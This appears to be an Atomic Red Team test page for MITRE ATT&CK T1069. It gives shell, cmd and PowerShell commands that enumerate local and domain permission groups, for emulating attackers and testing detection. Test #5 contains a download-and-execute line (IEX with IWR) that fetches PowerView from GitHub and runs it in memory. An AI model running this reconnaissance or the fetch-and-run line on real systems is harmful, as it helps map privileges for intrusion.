# T1069 - Permission Groups Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069)
<blockquote>Adversaries may attempt to find local system or domain-level groups and permissions settings. 

### Windows

Examples of commands that can list groups are <code>net group /domain</code> and <code>net localgroup</code> using the [Net](https://attack.mitre.org/software/S0039) utility.

### Mac

On Mac, this same thing can be accomplished with the <code>dscacheutil -q group</code> for the domain, or <code>dscl . -list /Groups</code> for local groups.

### Linux

On Linux, local groups can be enumerated with the <code>groups</code> command and domain groups via the <code>ldapsearch</code> command.

### Office 365 and Azure AD

With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft msrole)(Citation: GitHub Raindance)

Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command <code>az ad user get-member-groups</code> will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)</blockquote>

## Atomic Tests

- [Atomic Test #1 - Permission Groups Discovery](#atomic-test-1---permission-groups-discovery)

- [Atomic Test #2 - Basic Permission Groups Discovery Windows](#atomic-test-2---basic-permission-groups-discovery-windows)

- [Atomic Test #3 - Permission Groups Discovery PowerShell](#atomic-test-3---permission-groups-discovery-powershell)

- [Atomic Test #4 - Elevated group enumeration using net group](#atomic-test-4---elevated-group-enumeration-using-net-group)

- [Atomic Test #5 - Find machines where user has local admin access (PowerView)](#atomic-test-5---find-machines-where-user-has-local-admin-access-powerview)


<br/>

## Atomic Test #1 - Permission Groups Discovery
Permission Groups Discovery

**Supported Platforms:** macOS, Linux





#### Attack Commands: Run with `sh`! 


```sh
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi;
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
```






<br/>
<br/>

## Atomic Test #2 - Basic Permission Groups Discovery Windows
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.

**Supported Platforms:** Windows





#### Attack Commands: Run with `command_prompt`! 


```cmd
net localgroup
net group /domain
net group "domain admins" /domain
```






<br/>
<br/>

## Atomic Test #3 - Permission Groups Discovery PowerShell
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | administrator|


#### Attack Commands: Run with `powershell`! 


```powershell
get-localgroup
get-ADPrincipalGroupMembership #{user} | select name
```






<br/>
<br/>

## Atomic Test #4 - Elevated group enumeration using net group
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.

**Supported Platforms:** Windows





#### Attack Commands: Run with `command_prompt`! 


```cmd
net group /domai "Domain Admins"
net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
net group "BUILTIN\Backup Operators" /doma
```






<br/>
<br/>

## Atomic Test #5 - Find machines where user has local admin access (PowerView)
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.

**Supported Platforms:** Windows





#### Attack Commands: Run with `powershell`! 


```powershell
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-LocalAdminAccess -Verbose
```






<br/>
